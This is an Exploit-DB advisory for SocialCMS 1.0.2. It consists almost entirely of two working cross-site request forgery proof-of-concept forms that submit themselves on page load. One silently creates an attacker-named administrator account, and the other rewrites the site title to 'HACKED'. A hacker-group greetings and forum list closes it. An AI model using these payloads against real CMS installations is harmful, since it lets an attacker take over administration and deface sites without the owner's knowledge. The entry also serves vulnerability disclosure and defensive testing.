SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities

EDB-ID:

17193


Author:

vir0e5

Type:

webapps


Platform:

PHP

Date:

2011-04-20


<!---
    Title: socialcms1.0.2 Multiple CSRF Vulnerabilities
    Author: vir0e5 a.k.a banditc0de <vir0e5@yahoo.com>
    Date: Wed 20 april 2011 11:18:22 AM
    Vendor: www.socialcms.com 
    Download: http://sourceforge.net/projects/socialcms/
--->

<!-- Create Admin User -->

<body onload='document.csrf.submit()'>
	<form method="POST" name="csrf" action="http://localhost/web_test/socialcms/my_admin/admin1_members.php?action=member_new&page=1&mID=1"  class="form">
		<p><input type="hidden" name="TR_login_name" value="vir0e5"></p>
		<p><input type="hidden" name="TR_firstname" value="bandit"></p>
		<p><input type="hidden" name="TR_lastname" value="c0de"/></p>
		<p><input type="hidden" name="TREF_email_address" value="vir0e5@hackermail.com"/></p>
		<p><input type="hidden" name="TR_group_level" value=""/></p>
		<input type="hidden" name="update" value="update" type="submit" />
	</form>
</body>
	
<!-- Default site title -->
<body onload='document.csrf.submit()'>
	<form method="POST" name="csrf" action="http://localhost/web_test/socialcms/my_admin/admin1_configuration.php?gid=1&id=36&action=save"  class="form">
		<p><input type="hidden" name="TR_configuration_title" value="Default site title"></p>
		<p><input type="hidden" name="TR_configuration_name" value="CSRF VULN"></p>
		<p><input type="hidden" name="TR_configuration_value" value="HACKED"/></p>
		<p><input type="hidden" name="configuration_description" value="CSRF"/></p>
		<p><input type="hidden" name="IN_configuration_priority" value="0"/></p>
		<input type="hidden" name="update" value="update" type="submit" />
	</form>

****************-------**DCI2k7**--------*****************
[+] Greetings :[ mywisdom - kiddies - kamtiez - r3m1ck - aciz_n1nj4 | mozartklik |syafm0vic- 

skuteng_boy - blue_screen - agdi_cool - dangercode14045 - dewancc and YOU!!!! ] ;

[+] Forum [as member] : http://indonesian-cyber.org | http://tecon-crew.org | 

http://devilzc0de.org | http://santricyber.org | http://indonesiancoder.com | 

http://cyber4rt.com And OTHER's

Cause i'm Alone!!